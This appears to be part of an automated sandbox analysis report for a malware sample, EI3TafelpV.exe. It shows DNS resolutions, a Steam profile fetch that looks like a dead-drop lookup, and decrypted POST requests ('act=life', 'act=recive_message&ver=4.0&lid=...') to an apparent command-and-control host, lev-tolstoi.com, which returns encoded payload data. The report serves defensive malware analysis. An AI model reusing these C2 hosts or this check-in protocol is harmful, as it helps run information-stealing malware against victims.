                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:43.947336912 CET1.1.1.1192.168.2.90x171bNo error (0)bitbucket.org185.166.143.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:43.947336912 CET1.1.1.1192.168.2.90x171bNo error (0)bitbucket.org185.166.143.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)bbuseruploads.s3.amazonaws.coms3-1-w.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-1-w.amazonaws.coms3-w.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com52.216.41.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com52.216.244.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com3.5.28.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com52.216.32.89A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com3.5.21.85A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com3.5.30.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com3.5.25.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                      Dec 23, 2024 06:54:46.596955061 CET1.1.1.1192.168.2.90x91eaNo error (0)s3-w.us-east-1.amazonaws.com3.5.0.1A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                      • steamcommunity.com
                                                                                                                                                                                                                                                                                      • lev-tolstoi.com
                                                                                                                                                                                                                                                                                      • bitbucket.org
                                                                                                                                                                                                                                                                                      • bbuseruploads.s3.amazonaws.com

                                                                                                                                                                                                                                                                                      HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      0192.168.2.94970723.55.153.1064437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:19 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Host: steamcommunity.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:19 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                                      Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:19 GMT
                                                                                                                                                                                                                                                                                      Content-Length: 35121
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: sessionid=b2f335ddb290b082e4af6a03; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:19 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                                      Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:20 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                                      Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:20 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                                      Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      1192.168.2.949708172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:21 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 8
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:21 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                      Data Ascii: act=life
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:22 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:22 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=sg089cng484ljdblbq04hjni3q; expires=Thu, 17 Apr 2025 23:41:01 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eat2dxXAdUAVKZ4rKqu6asMULlFHGR4ugKejcjFvotMwC53vvcxmeFMPIMcvigLW8FNLB2lbt06bfT31x9OuZSOVSDloj6HswexZiT1NMIVIctLjtn%2Bnxdfsbuo8vfmFyUc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6618b65ec88cc6-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2011&min_rtt=2011&rtt_var=755&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1449851&cwnd=222&unsent_bytes=0&cid=9f258a4f5c26e4dd&ts=757&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:22 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:22 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                      2192.168.2.949709172.67.157.2544437524C:\Users\user\Desktop\EI3TafelpV.exe
                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:23 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                      Content-Length: 53
                                                                                                                                                                                                                                                                                      Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:23 UTC53OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
                                                                                                                                                                                                                                                                                      Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1119INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 05:54:24 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                      Set-Cookie: PHPSESSID=4ef79iuusml3vq636d41gqe87o; expires=Thu, 17 Apr 2025 23:41:03 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                                                      X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                      cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                      vary: accept-encoding
                                                                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3O1uRVwL4XcAEIWmJxEDman1OvteaR34E57SIbnR82CbjxVVERFhqZp6FsUTg4ruIDYC2cqVBnsqop4ZYY6A5Lcg6o%2F94mRtAAhuXdvgy3cOEABhLC9SsQ5FegcO9qju5gI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                      CF-RAY: 8f6618c2de64c436-EWR
                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1468&rtt_var=571&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2834&recv_bytes=952&delivery_rate=1880231&cwnd=220&unsent_bytes=0&cid=10ea9a90d3fe8773&ts=778&x=0"
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC250INData Raw: 31 63 61 38 0d 0a 44 61 46 71 73 6b 50 5a 58 65 50 64 6f 6d 6b 65 64 34 4c 2f 52 44 57 7a 41 6b 4c 47 62 48 30 53 57 4d 4f 50 75 79 41 4b 35 75 46 32 67 78 79 51 65 65 31 78 77 61 37 48 53 79 51 44 38 49 6f 68 47 5a 46 6a 4a 75 52 57 47 33 4d 30 73 4f 71 58 41 6e 79 4c 77 7a 66 48 43 39 34 77 76 48 48 42 75 4e 70 4c 4a 43 7a 35 33 53 46 62 6b 54 68 67 6f 77 59 66 63 7a 53 68 37 74 42 50 65 6f 71 43 5a 63 30 4e 32 69 61 36 4f 59 4b 78 7a 77 78 37 45 75 4f 56 4b 6c 7a 65 61 69 2f 6b 51 46 39 33 49 75 47 31 6d 57 31 76 6b 6f 42 41 77 42 6e 5a 59 61 52 78 6d 50 2f 48 42 7a 78 4e 6f 4a 34 68 56 39 39 6b 4a 71 30 45 46 58 6f 38 6f 4f 76 52 55 47 4f 41 69 57 58 44 44 74 73 73 73 79 32 50 75 38 67 48 66 52 6a 6a 33 57 67 58 31 6e 68 67 2f 45 35 4d
                                                                                                                                                                                                                                                                                      Data Ascii: 1ca8DaFqskPZXePdomked4L/RDWzAkLGbH0SWMOPuyAK5uF2gxyQee1xwa7HSyQD8IohGZFjJuRWG3M0sOqXAnyLwzfHC94wvHHBuNpLJCz53SFbkThgowYfczSh7tBPeoqCZc0N2ia6OYKxzwx7EuOVKlzeai/kQF93IuG1mW1vkoBAwBnZYaRxmP/HBzxNoJ4hV99kJq0EFXo8oOvRUGOAiWXDDtsssy2Pu8gHfRjj3WgX1nhg/E5M
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 51 6a 6d 77 2f 4d 78 50 65 49 4c 44 63 49 30 52 6b 43 61 33 66 39 6e 2f 79 41 64 79 45 4f 4f 53 49 56 62 52 63 69 2b 6b 44 52 64 34 50 71 76 69 31 6b 31 6d 6a 6f 52 6e 79 67 2f 66 4a 72 4d 35 6a 72 79 41 52 54 77 53 2b 4e 31 2b 46 2f 46 77 49 36 63 61 45 6d 46 36 76 71 50 41 41 6d 2b 49 77 7a 65 44 44 74 34 67 74 6a 2b 54 74 38 73 41 65 51 66 72 6c 43 74 61 30 57 30 71 71 77 30 66 64 7a 43 72 34 74 4e 47 5a 59 6d 46 62 38 4e 49 6e 6d 47 38 4a 38 48 6e 67 43 68 35 42 65 65 52 4d 42 58 72 49 44 2f 71 46 31 39 33 4e 75 47 31 6d 55 70 74 68 34 42 6b 7a 41 76 59 4b 71 6b 2f 6b 37 6e 4e 44 6d 34 54 35 5a 4d 73 56 4d 4e 71 4c 71 49 4e 46 6e 73 7a 70 4f 72 64 41 69 62 45 68 48 65 44 55 4a 41 41 74 6a 53 4e 74 64 63 4c 50 41 71 75 68 47 5a 51 33 53 42 34 35 41 6f
                                                                                                                                                                                                                                                                                      Data Ascii: Qjmw/MxPeILDcI0RkCa3f9n/yAdyEOOSIVbRci+kDRd4Pqvi1k1mjoRnyg/fJrM5jryARTwS+N1+F/FwI6caEmF6vqPAAm+IwzeDDt4gtj+Tt8sAeQfrlCta0W0qqw0fdzCr4tNGZYmFb8NInmG8J8HngCh5BeeRMBXrID/qF193NuG1mUpth4BkzAvYKqk/k7nNDm4T5ZMsVMNqLqINFnszpOrdAibEhHeDUJAAtjSNtdcLPAquhGZQ3SB45Ao
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 36 33 65 57 69 6a 63 77 30 58 41 48 4e 4d 72 2b 51 71 43 73 63 34 4d 61 6c 58 2f 30 7a 38 58 31 6d 78 67 2f 45 34 53 63 54 4b 6e 2f 39 5a 50 61 34 71 4e 59 4d 59 48 32 43 47 37 4d 6f 53 37 79 77 42 2f 47 4f 53 50 4c 46 66 5a 5a 53 47 75 42 46 38 2b 65 71 62 31 6d 52 6f 6f 74 5a 52 6b 67 54 33 54 4c 37 55 34 6c 2f 2f 66 52 57 56 56 35 35 46 6d 44 35 46 74 4b 4b 45 4c 45 48 45 77 72 2b 6a 54 54 6d 43 4b 67 48 33 4d 44 4e 41 74 73 7a 57 4d 73 63 51 44 64 52 37 72 6d 79 5a 57 32 79 42 75 35 41 6b 48 4d 47 4c 68 32 64 35 4f 5a 59 76 42 57 73 41 47 33 69 61 74 66 35 37 78 32 55 74 37 47 61 44 46 5a 6c 76 59 59 43 75 75 43 68 39 33 4e 36 54 75 33 6b 46 6c 67 34 6c 68 78 41 7a 63 4b 4c 59 35 67 62 6a 45 44 6d 34 51 36 5a 45 71 46 35 38 67 4a 37 78 4f 52 7a 41 56
                                                                                                                                                                                                                                                                                      Data Ascii: 63eWijcw0XAHNMr+QqCsc4MalX/0z8X1mxg/E4ScTKn/9ZPa4qNYMYH2CG7MoS7ywB/GOSPLFfZZSGuBF8+eqb1mRootZRkgT3TL7U4l//fRWVV55FmD5FtKKELEHEwr+jTTmCKgH3MDNAtszWMscQDdR7rmyZW2yBu5AkHMGLh2d5OZYvBWsAG3iatf57x2Ut7GaDFZlvYYCuuCh93N6Tu3kFlg4lhxAzcKLY5gbjEDm4Q6ZEqF58gJ7xORzAV
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 6f 6f 6a 59 70 39 7a 51 62 5a 4c 4c 30 33 68 72 48 4e 41 48 6f 65 35 35 6f 67 57 74 6c 74 4a 61 63 50 47 33 6f 6f 6f 75 62 54 54 32 4c 45 7a 53 2f 45 45 4a 42 35 2b 78 69 4e 6c 74 41 51 62 67 4f 67 67 6d 68 4f 6b 57 63 73 35 46 5a 66 63 7a 57 6f 34 74 46 4b 5a 34 75 48 59 63 55 4f 33 53 53 30 4e 5a 4f 33 7a 67 5a 33 47 75 75 50 4a 6c 72 56 62 43 53 73 42 52 55 77 64 4f 48 71 77 51 49 77 78 4c 5a 69 7a 41 6a 54 4e 2f 73 67 7a 36 61 41 44 48 42 56 75 4e 30 71 57 64 46 76 4c 4b 67 46 46 33 45 32 72 2b 72 63 53 32 43 4d 6b 57 37 48 41 4e 45 76 74 44 36 46 75 73 55 50 65 78 48 6d 6b 6d 59 5a 6b 57 63 34 35 46 5a 66 58 78 32 55 72 2f 68 34 4b 4a 76 4e 64 6f 4d 50 33 47 48 6a 66 34 32 38 7a 41 4e 7a 45 2b 6d 52 4c 46 37 61 62 43 75 67 41 68 5a 31 50 4b 44 6f 33
                                                                                                                                                                                                                                                                                      Data Ascii: oojYp9zQbZLL03hrHNAHoe55ogWtltJacPG3oooubTT2LEzS/EEJB5+xiNltAQbgOggmhOkWcs5FZfczWo4tFKZ4uHYcUO3SS0NZO3zgZ3GuuPJlrVbCSsBRUwdOHqwQIwxLZizAjTN/sgz6aADHBVuN0qWdFvLKgFF3E2r+rcS2CMkW7HANEvtD6FusUPexHmkmYZkWc45FZfXx2Ur/h4KJvNdoMP3GHjf428zANzE+mRLF7abCugAhZ1PKDo3
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 4b 66 63 30 46 33 79 6d 7a 4e 6f 43 37 78 51 5a 36 47 65 71 63 49 56 6e 66 61 47 44 71 54 68 68 6f 65 76 6d 74 2b 46 4a 7a 6c 70 56 69 34 67 58 66 59 61 52 78 6d 50 2f 48 42 7a 78 4e 6f 4a 51 30 55 39 78 79 4b 61 4d 41 45 48 4d 6f 6f 4f 44 53 55 47 2b 4c 68 32 6a 50 44 74 38 6e 75 6a 71 4c 73 38 63 4f 64 78 72 73 33 57 67 58 31 6e 68 67 2f 45 34 78 65 79 6d 32 37 74 64 4a 66 70 2f 44 63 49 30 52 6b 43 61 33 66 39 6e 2f 77 77 42 33 45 65 43 52 4a 6c 50 63 59 44 4b 72 43 52 68 35 4d 62 50 6e 33 6b 56 6a 6a 49 68 67 78 52 72 63 4c 36 6b 36 6b 36 32 41 52 54 77 53 2b 4e 31 2b 46 2b 64 6e 4d 4c 51 4e 58 55 45 73 6f 76 76 53 54 32 54 45 6e 43 48 61 53 4e 63 74 2b 32 66 42 75 63 38 43 66 78 72 68 6c 43 70 61 31 47 6b 6c 70 51 67 62 65 6a 43 68 36 39 39 44 62 59
                                                                                                                                                                                                                                                                                      Data Ascii: Kfc0F3ymzNoC7xQZ6GeqcIVnfaGDqThhoevmt+FJzlpVi4gXfYaRxmP/HBzxNoJQ0U9xyKaMAEHMooODSUG+Lh2jPDt8nujqLs8cOdxrs3WgX1nhg/E4xeym27tdJfp/DcI0RkCa3f9n/wwB3EeCRJlPcYDKrCRh5MbPn3kVjjIhgxRrcL6k6k62ARTwS+N1+F+dnMLQNXUEsovvST2TEnCHaSNct+2fBuc8CfxrhlCpa1GklpQgbejCh699DbY
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC1369INData Raw: 42 4a 42 35 2b 7a 79 47 76 4d 45 42 64 52 6e 76 6d 69 4a 46 32 32 63 79 70 51 38 55 66 54 61 68 34 4e 52 49 61 59 32 4f 59 38 34 50 31 79 36 2b 66 38 2f 2f 78 78 4d 38 54 61 43 38 4b 31 7a 64 4f 33 72 6b 45 56 46 70 65 71 62 68 6d 52 6f 6f 68 49 6c 71 79 51 58 54 4c 72 67 74 67 4c 6e 53 43 33 45 66 38 70 63 74 55 74 78 74 4c 61 63 49 47 58 73 32 73 2b 54 5a 51 57 50 45 7a 53 2f 45 45 4a 42 35 2b 78 79 57 71 63 6f 4d 63 41 50 72 6e 43 56 42 33 48 42 67 36 6b 34 4f 64 79 76 68 74 63 39 53 66 34 4f 63 49 64 70 49 31 79 33 37 5a 38 47 35 79 51 31 37 45 2b 36 50 49 31 48 65 62 79 6d 74 43 68 64 7a 4f 71 58 70 33 6b 64 72 69 49 68 6f 77 41 66 55 4b 4c 55 32 6a 76 2b 4f 53 33 73 4e 6f 4d 56 6d 64 73 70 6a 4c 4b 6c 4f 41 44 34 6a 34 65 72 56 41 6a 44 45 6a 32 48
                                                                                                                                                                                                                                                                                      Data Ascii: BJB5+zyGvMEBdRnvmiJF22cypQ8UfTah4NRIaY2OY84P1y6+f8//xxM8TaC8K1zdO3rkEVFpeqbhmRoohIlqyQXTLrgtgLnSC3Ef8pctUtxtLacIGXs2s+TZQWPEzS/EEJB5+xyWqcoMcAPrnCVB3HBg6k4Odyvhtc9Sf4OcIdpI1y37Z8G5yQ17E+6PI1HebymtChdzOqXp3kdriIhowAfUKLU2jv+OS3sNoMVmdspjLKlOAD4j4erVAjDEj2H
                                                                                                                                                                                                                                                                                      2024-12-23 05:54:24 UTC249INData Raw: 37 34 34 6c 2f 33 31 43 48 49 62 35 34 74 6d 53 4f 34 75 59 4b 73 55 58 79 67 44 75 4b 33 65 54 69 6a 63 77 33 72 45 43 4e 63 37 72 54 69 4e 72 73 73 47 63 44 66 76 6d 6a 42 55 33 6d 4d 78 72 55 49 55 66 58 72 76 72 64 35 61 4b 4e 7a 44 51 4d 51 65 30 77 36 34 4c 6f 6a 2f 6a 6b 74 37 41 36 44 46 5a 6d 6d 52 63 69 4f 30 44 52 42 68 42 4f 47 31 77 48 77 6f 6a 35 56 6f 30 77 76 47 4b 72 59 7a 6b 49 47 41 55 79 68 48 73 73 39 30 42 63 34 67 50 35 74 41 58 33 46 36 2b 64 54 41 41 6e 37 45 32 7a 32 4e 53 4d 4a 68 34 33 2f 47 76 4e 49 5a 65 68 62 32 6e 6d 46 70 37 30 63 32 72 67 6b 50 64 79 32 75 72 5a 63 43 5a 38 54 62 56 6f 4d 42 31 7a 71 71 4b 59 79 76 78 30 74 44 57 36 43 46 5a 67 2b 52 56 53 4f 71 41 42 68 6d 4b 2b 7a 4b 7a 30 68 76 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 744l/31CHIb54tmSO4uYKsUXygDuK3eTijcw3rECNc7rTiNrssGcDfvmjBU3mMxrUIUfXrvrd5aKNzDQMQe0w64Loj/jkt7A6DFZmmRciO0DRBhBOG1wHwoj5Vo0wvGKrYzkIGAUyhHss90Bc4gP5tAX3F6+dTAAn7E2z2NSMJh43/GvNIZehb2nmFp70c2rgkPdy2urZcCZ8TbVoMB1zqqKYyvx0tDW6CFZg+RVSOqABhmK+zKz0hv
